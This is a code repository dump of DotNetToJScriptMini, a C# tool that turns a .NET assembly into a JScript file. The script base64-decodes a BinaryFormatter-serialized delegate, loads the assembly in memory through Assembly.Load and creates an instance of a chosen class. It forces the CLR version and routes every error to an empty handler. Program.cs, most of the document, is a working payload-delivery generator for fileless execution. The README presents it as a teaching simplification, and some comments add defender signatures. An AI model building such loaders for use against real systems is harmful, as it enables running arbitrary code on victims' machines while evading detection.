├── .gitignore
├── .vs
└── DotNetToJScriptMini
│ └── v16
│ └── .suo
├── DotNetToJScriptMini.sln
├── DotNetToJScriptMini
├── App.config
├── DotNetToJScriptMini.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── bin
│ └── Release
│ │ ├── DotNetToJScriptMini.exe.config
│ │ └── DotNetToJScriptMini.pdb
└── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ └── DotNetToJScriptMini.csprojAssemblyReference.cache
│ └── Release
│ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── DotNetToJScriptMini.csproj.CoreCompileInputs.cache
│ ├── DotNetToJScriptMini.csproj.FileListAbsolute.txt
│ ├── DotNetToJScriptMini.csprojAssemblyReference.cache
│ └── DotNetToJScriptMini.pdb
└── README.md
/.gitignore:
--------------------------------------------------------------------------------
1 | *.exe
2 | *.dll
3 |
--------------------------------------------------------------------------------
/.vs/DotNetToJScriptMini/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/.vs/DotNetToJScriptMini/v16/.suo
--------------------------------------------------------------------------------
/DotNetToJScriptMini.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30114.105
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DotNetToJScriptMini", "DotNetToJScriptMini\DotNetToJScriptMini.csproj", "{D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {9283E228-0479-474B-A7C2-7A2114713E8F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/DotNetToJScriptMini.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D502E9D0-7B4E-46C0-A59B-EC84D9AE873E}
8 | Exe
9 | DotNetToJScriptMini
10 | DotNetToJScriptMini
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Reflection;
6 | using System.Runtime.Remoting.Messaging;
7 | using System.Runtime.Serialization.Formatters.Binary;
8 | using System.Text;
9 | using System.Xml.Schema;
10 |
11 | namespace DotNetToJScriptMini
12 | {
13 | // The original research on BinaryFormatter and on serializing/deserializing delegates is by James Forshaw (@tiraniddo).
14 | // DotNetToJScript was born from that research.
15 | // https://googleprojectzero.blogspot.com/2017/08/bypassing-virtualbox-process-hardening.html
16 | //
17 | class Program
18 | {
// ---- Assembly functions ----

/// <summary>
/// Builds the delegate object graph that <c>Main</c> later serializes with BinaryFormatter:
/// an <c>XmlValueGetter</c> closed over the assembly bytes and pointing at
/// <c>Assembly.Load(byte[])</c>, wrapped in a <c>HeaderHandler</c> whose method is the
/// inner delegate's <c>DynamicInvoke</c>.
/// </summary>
/// <param name="assembly">Raw assembly image; it becomes the bound first argument of the inner delegate.</param>
/// <returns>The outer <c>HeaderHandler</c> delegate, typed as <c>object</c>.</returns>
/// <remarks>
/// Nothing is loaded or invoked here; the method only constructs delegates and prints progress.
/// For detection work: a BinaryFormatter stream built from this graph carries the delegate type
/// names and the <c>Assembly.Load</c> target method, so that combination inside a serialized
/// blob is a useful content signature.
/// </remarks>
static object BuildLoaderDelegate(byte[] assembly)
{
    Type getterType = typeof(XmlValueGetter);
    MethodInfo loadFromBytes = typeof(Assembly).GetMethod("Load", new Type[] { typeof(byte[]) });

    Console.WriteLine($" -> Delegate");
    Console.WriteLine(" " + getterType);
    Console.WriteLine(" " + loadFromBytes);

    // Closed delegate: the byte array is bound as the first argument of the static
    // Assembly.Load(byte[]), which is why a parameterless delegate type can be used.
    // Overload used: Delegate.CreateDelegate(Type, Object, MethodInfo)
    // https://docs.microsoft.com/en-us/dotnet/api/system.delegate.createdelegate?view=net-5.0
    // https://docs.microsoft.com/en-us/dotnet/framework/reflection-and-codedom/how-to-hook-up-a-delegate-using-reflection
    // https://github.com/TheWover/beercode/blob/master/loaders/DeserializeAssembly.cs010
    Delegate boundLoader = Delegate.CreateDelegate(getterType, assembly, loadFromBytes);

    // HeaderHandler takes an array of headers; DynamicInvoke takes an array of objects.
    // Delegate contra-variance lets the latter stand in for the former (the caller passes
    // a null argument anyway).
    Console.WriteLine($" -> Create a COM inovkable delegate to call the loader");
    HeaderHandler comCallable = new HeaderHandler(boundLoader.DynamicInvoke);
    return comCallable;
}
45 |
46 |
// ---- JScript Generation ----

/// <summary>
/// Renders the JScript text that carries the serialized delegate graph.
/// </summary>
/// <param name="serialized_object">BinaryFormatter output to embed, base64-encoded, in the script.</param>
/// <param name="entry_class_name">Type name written into the script's <c>entry_class</c> variable.</param>
/// <returns>The complete script source as a single string.</returns>
/// <remarks>
/// What the emitted script does, in order, as visible in the template below:
/// 1. reads a .NETFramework registry key and sets the process variable COMPLUS_Version
///    to v4.0.30319, or to v2.0.50727 when the read fails;
/// 2. decodes the base64 blob through COM-visible .NET classes (ASCIIEncoding,
///    FromBase64Transform, MemoryStream);
/// 3. creates BinaryFormatter through ActiveXObject and deserializes the blob;
/// 4. calls DynamicInvoke on the result and CreateInstance on what that returns.
/// Errors are passed to debug(), which is an empty function, so failures are silent.
/// Defender notes: the ProgID strings and the COMPLUS_Version assignment are stable
/// content signatures for script scanning. .NET Framework 4.8 and later on Windows 10
/// submit assemblies loaded from byte arrays to AMSI, which covers step 4.
/// NOTE(review): entry_class_name is placed inside a single-quoted script literal
/// without escaping; Main only passes names it found in the assembly.
/// </remarks>
static string generateScript(byte[] serialized_object, string entry_class_name)
{
    // One quoted base64 chunk per line, joined with the script's string concatenation operator.
    string payloadLiteral = String.Join("+" + Environment.NewLine, BinToBase64Lines(serialized_object));

    var js = new StringBuilder();

    // setversion(): chooses the CLR version for this process via COMPLUS_Version.
    js.Append("function setversion() {\n");
    js.Append(" var shell = new ActiveXObject('WScript.Shell');\n");
    js.Append(" ver = 'v4.0.30319';\n");
    js.Append(" try {\n");
    js.Append(" shell.RegRead('HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\');\n");
    js.Append(" } catch(e) { \n");
    js.Append(" ver = 'v2.0.50727';\n");
    js.Append(" }\n");
    js.Append(" shell.Environment('Process')('COMPLUS_Version') = ver;\n");
    js.Append("}");
    js.Append("\n\n");

    // debug() is a no-op; base64ToStream() turns the base64 text into a MemoryStream.
    js.Append("function debug(s) {}\n");
    js.Append("function base64ToStream(b) {\n");
    js.Append(" var enc = new ActiveXObject(\"System.Text.ASCIIEncoding\");\n");
    js.Append(" var length = enc.GetByteCount_2(b);\n");
    js.Append(" var ba = enc.GetBytes_4(b);\n");
    js.Append(" var transform = new ActiveXObject(\"System.Security.Cryptography.FromBase64Transform\");\n");
    js.Append(" ba = transform.TransformFinalBlock(ba, 0, length);\n");
    js.Append(" var ms = new ActiveXObject(\"System.IO.MemoryStream\");\n");
    // (length / 4) * 3 is exact only because BinToBase64Lines pads to a multiple of 3 bytes.
    js.Append(" ms.Write(ba, 0, (length / 4) * 3);\n");
    js.Append(" ms.Position = 0;\n");
    js.Append(" return ms;\n");
    js.Append("}");
    js.Append("\n\n");

    // The two values that vary between generated scripts.
    js.Append($"var serialized_obj = {payloadLiteral};\n");
    js.Append($"var entry_class = '{entry_class_name}';");
    js.Append("\n\n");

    // Driver: deserialize, invoke, instantiate; every error goes to the empty debug().
    js.Append("try {\n");
    js.Append(" setversion();\n");
    js.Append(" var stm = base64ToStream(serialized_obj);\n");
    js.Append(" var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');\n");
    js.Append(" var al = new ActiveXObject('System.Collections.ArrayList');\n");
    js.Append(" var d = fmt.Deserialize_2(stm);\n");
    js.Append(" al.Add(undefined);\n");
    js.Append(" var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);");
    js.Append(" \n\n");
    js.Append("} catch (e) {\n");
    js.Append(" debug(e.message);\n");
    js.Append("}\n\n");

    return js.ToString();
}
100 |
101 |
// ---- Helper functions ----

/// <summary>
/// Base64-encodes a byte array and returns the encoded text as double-quoted lines.
/// </summary>
/// <param name="serialized_object">Bytes to encode. The caller's array is not modified.</param>
/// <returns>
/// One element per base64 output line, each wrapped in double quotes. An empty input
/// yields a single element containing two quote characters.
/// </returns>
/// <remarks>
/// The input is zero-padded up to a multiple of three bytes before encoding, so the
/// base64 text never ends in '=' padding.
/// NOTE(review): Convert.ToBase64String breaks lines with CRLF, while the split below
/// uses Environment.NewLine; the two agree only where NewLine is CRLF.
/// </remarks>
public static string[] BinToBase64Lines(byte[] serialized_object)
{
    int originalLength = serialized_object.Length;
    int remainder = originalLength % 3;

    byte[] padded = serialized_object;
    if (remainder != 0)
    {
        // New zero-filled buffer rounded up to the next multiple of three.
        padded = new byte[originalLength + (3 - remainder)];
        Buffer.BlockCopy(serialized_object, 0, padded, 0, originalLength);
    }

    string encoded = Convert.ToBase64String(padded, Base64FormattingOptions.InsertLineBreaks);
    string[] rawLines = encoded.Split(new string[] { Environment.NewLine }, StringSplitOptions.None);

    string[] quoted = new string[rawLines.Length];
    for (int i = 0; i < rawLines.Length; i++)
    {
        quoted[i] = "\"" + rawLines[i] + "\"";
    }

    return quoted;
}
119 |
/// <summary>
/// Prints a short banner with the three run parameters to standard output.
/// </summary>
/// <param name="asm">Path of the input assembly.</param>
/// <param name="cls">Entry class name.</param>
/// <param name="output">Name of the script file that will be written.</param>
static void Summary(string asm = "", string cls = "", string output = "")
{
    string[] banner =
    {
        "\n=[ Summary ]==================",
        $" Assembly : {asm}",
        $" Entry class name: {cls}",
        $" Output JS file : {output}",
        "==============================\n",
    };

    foreach (string line in banner)
    {
        Console.WriteLine(line);
    }
}
128 |
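/// <summary>
/// Lists the full names of the types in an assembly image that are public and have a
/// public parameterless constructor.
/// </summary>
/// <param name="assembly">Raw bytes of the assembly to inspect.</param>
/// <returns>The set of matching type names; empty when no type qualifies.</returns>
/// <exception cref="BadImageFormatException">The bytes are not a valid assembly.</exception>
/// <remarks>
/// The set is declared as <c>HashSet&lt;string&gt;</c>; System.Collections.Generic has no
/// non-generic HashSet, so the bare name does not compile.
/// NOTE(review): Assembly.Load(byte[]) loads the image into the current AppDomain as a
/// normal, executable assembly, not as an inspection-only load. Only run this against
/// assemblies you trust, or inspect unknown samples in an isolated environment.
/// </remarks>
static HashSet<string> GetValidClasses(byte[] assembly)
{
    Assembly loaded = Assembly.Load(assembly);

    // "Valid" means the type can be created with no arguments from outside the assembly.
    IEnumerable<string> constructibleNames = loaded.GetTypes()
        .Where(t => t.IsPublic && t.GetConstructor(Type.EmptyTypes) != null)
        .Select(t => t.FullName);

    return new HashSet<string>(constructibleNames);
}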
135 |
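/// <summary>
/// Command-line entry point: validates the arguments, checks that the entry class exists
/// in the input assembly, serializes the loader delegate with BinaryFormatter and writes
/// the generated script next to the current working directory.
/// </summary>
/// <param name="args">
/// One to three positional arguments. From the parsing below and the README example:
/// assembly path, entry class name (defaults to "TestClass"), output file name
/// (defaults to the assembly's file name). The output always gets a ".js" extension
/// and any directory part of the third argument is discarded.
/// </param>
/// <remarks>
/// Changes against the listing: the class-name set is declared as
/// <c>HashSet&lt;string&gt;</c> (the bare <c>HashSet</c> does not compile), and the
/// MemoryStream is disposed.
/// NOTE(review): the usage lines print only "[OUTPUTJS]"; the placeholders for the first
/// two arguments appear to be missing from the message text.
/// </remarks>
static void Main(string[] args)
{
    var myname = System.AppDomain.CurrentDomain.FriendlyName;

    if (args.Length < 1 || args.Length > 3)
    {
        Console.WriteLine("[*] Usage:");
        Console.WriteLine($"{myname} [OUTPUTJS]\n");
        return;
    }

    string assembly_path = args[0];
    string entryClassName = args.Length >= 2 ? args[1] : "TestClass";
    string outputSource = args.Length == 3 ? args[2] : assembly_path;
    string outputJS = Path.GetFileNameWithoutExtension(outputSource) + ".js";

    Summary(assembly_path, entryClassName, outputJS);

    if (!File.Exists(assembly_path))
    {
        Console.Error.WriteLine($"[x] Error: File not found! {assembly_path}");
        Console.WriteLine($"{myname} [OUTPUTJS]\n");
        Environment.Exit(1);
    }

    // Read the binary
    byte[] assembly = File.ReadAllBytes(assembly_path);

    // Try to find the entry class or enumerate all public classes.
    // GetValidClasses loads the assembly into this process to reflect over it.
    try
    {
        HashSet<string> valid_classes = GetValidClasses(assembly);
        if (!valid_classes.Contains(entryClassName))
        {
            Console.Error.WriteLine($"[x] Error: Class '{entryClassName}' not found in assembly.");
            if (valid_classes.Count == 0)
            {
                Console.Error.WriteLine($"[x] Error: Assembly doesn't contain any public, default constructable classes");
            }
            else
            {
                Console.Error.WriteLine($"[!] Use one of the following valid classes from the binary as a second arguement:");
                foreach (string name in valid_classes)
                {
                    Console.Error.WriteLine($" - {name}");
                }

                Console.WriteLine($"\n{myname} [OUTPUTJS]\n");
            }
            Environment.Exit(1);
        }
    }
    catch (Exception e)
    {
        Console.Error.WriteLine($"[x] Error: loading assembly information.");
        Console.WriteLine(e);
        Environment.Exit(1);
    }

    Console.WriteLine($"[+] Found a valid class '{entryClassName}'");

    // BinaryFormatter is used here only to serialize the delegate graph into memory.
    BinaryFormatter formatter = new BinaryFormatter();
    using (MemoryStream memoryStream = new MemoryStream())
    {
        Console.WriteLine($"[+] Serilizing the assembly object");
        formatter.Serialize(memoryStream, BuildLoaderDelegate(assembly));

        Console.WriteLine($"[+] Generating JS file '{outputJS}'");
        string jScriptCode = generateScript(memoryStream.ToArray(), entryClassName);

        // UTF-8 without a byte-order mark.
        File.WriteAllText(outputJS, jScriptCode, new UTF8Encoding(false));
    }
}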
223 | }
224 | }
225 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DotNetToJScriptMini")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DotNetToJScriptMini")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d502e9d0-7b4e-46c0-a59b-ec84d9ae873e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/bin/Release/DotNetToJScriptMini.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/bin/Release/DotNetToJScriptMini.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/bin/Release/DotNetToJScriptMini.pdb
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Debug/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Debug/DotNetToJScriptMini.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Debug/DotNetToJScriptMini.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 6a7ab24d74b7e25a7ffff290d4fe2dc8916038a2
2 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\bin\Release\DotNetToJScriptMini.exe.config
2 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\bin\Release\DotNetToJScriptMini.exe
3 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\bin\Release\DotNetToJScriptMini.pdb
4 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.csprojAssemblyReference.cache
5 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.csproj.CoreCompileInputs.cache
6 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.exe
7 | Z:\CSharp\DotNetToJScriptMini\DotNetToJScriptMini\obj\Release\DotNetToJScriptMini.pdb
8 |
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KINGSABRI/DotNetToJScriptMini/1e0fd3ccbd649a27b546d14f1954407efd0bb828/DotNetToJScriptMini/obj/Release/DotNetToJScriptMini.pdb
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DotNetToJScriptMini
2 | A simplified (abstract) version of DotNetToJScript to create a JScript file which loads a .NET v2 assembly from memory.
3 |
4 | I created this script to simplify understanding how DotNetToJScript works.
5 |
6 | ## Usage
7 | ```
8 | [*] Usage:
9 | DotNetToJScriptMini.exe [OUTPUTJS]
10 | ```
11 | example:
12 | ```
13 | DotNetToJScriptMini.exe .\ExampleAssembly.dll TestClass mini.js
14 | ```
15 |
--------------------------------------------------------------------------------